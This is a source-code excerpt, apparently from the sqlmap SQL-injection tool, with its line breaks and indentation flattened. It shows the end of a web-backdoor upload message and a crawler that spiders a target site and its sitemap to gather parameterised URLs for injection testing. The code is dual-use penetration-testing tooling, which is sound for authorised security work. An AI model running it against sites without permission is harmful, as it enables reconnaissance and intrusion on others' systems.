infoMsg += "uploaded on '%s' - " % self.webDirectory infoMsg += self.webBackdoorUrl logger.info(infoMsg) break
def crawl(target): try: visited = set() threadData = getCurrentThreadData() threadData.shared.value = OrderedSet() def crawlThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() if current in visited: continue elif conf.crawlExclude and re.search( conf.crawlExclude, current): dbgMsg = "skipping '%s'" % current logger.debug(dbgMsg) continue else: visited.add(current) else: break content = None try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] except SqlmapConnectionException as ex: errMsg = "connection exception detected ('%s'). skipping " % getSafeExString( ex) errMsg += "URL '%s'" % current logger.critical(errMsg) except SqlmapSyntaxException: errMsg = "invalid URL detected. skipping '%s'" % current logger.critical(errMsg) except _http_client.InvalidURL as ex: errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString( ex) errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break if isinstance(content, unicode): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: content = "<html>%s</html>" % match.group(1) soup = BeautifulSoup(content) tags = soup('a') if not tags: tags = re.finditer( r'(?i)<a[^>]+href="(?P<href>[^>"]+)"', content) for tag in tags: href = tag.get("href") if hasattr( tag, "get") else tag.group("href") if href: if threadData.lastRedirectURL and threadData.lastRedirectURL[ 0] == threadData.lastRequestUID: current = threadData.lastRedirectURL[1] url = _urllib.parse.urljoin(current, href) # flag to know if we are dealing with the same target host _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): continue elif not _: continue if url.split('.')[-1].lower( ) not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) if re.search(r"(.*?)\?(.+)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass except ValueError: # for non-valid links pass finally: if conf.forms: findPageForms(content, current, False, True) if conf.verbose in (1, 2): threadData.shared.count += 1 status = '%d/%d links visited (%d%%)' % ( threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) dataToStdout( "\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) if not conf.sitemapUrl: message = "do you want to check for the existence of " message += "site's sitemap(.xml) [y/N] " if readInput(message, default='N', boolean=True): found = True items = None url = _urllib.parse.urljoin(target, "/sitemap.xml") try: items = parseSitemap(url) except SqlmapConnectionException as ex: if "page not found" in getSafeExString(ex): found = False logger.warn("'sitemap.xml' not found") except: pass finally: if found: if items: for item in items: if re.search(r"(.*?)\?(.+)", item): threadData.shared.value.add(item) if conf.crawlDepth > 1: threadData.shared.unprocessed.update(items) logger.info("%s links found" % ("no" if not items else len(items))) infoMsg = "starting crawler" if conf.bulkFile: infoMsg += " for target URL '%s'" % target logger.info(infoMsg) for i in xrange(conf.crawlDepth): threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) if not conf.bulkFile: logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: warnMsg = "no usable links found (with GET parameters)" logger.warn(warnMsg) else: for url in threadData.shared.value: kb.targets.add( (urldecode(url, kb.pageEncoding), None, None, None, None)) storeResultsToFile(kb.targets)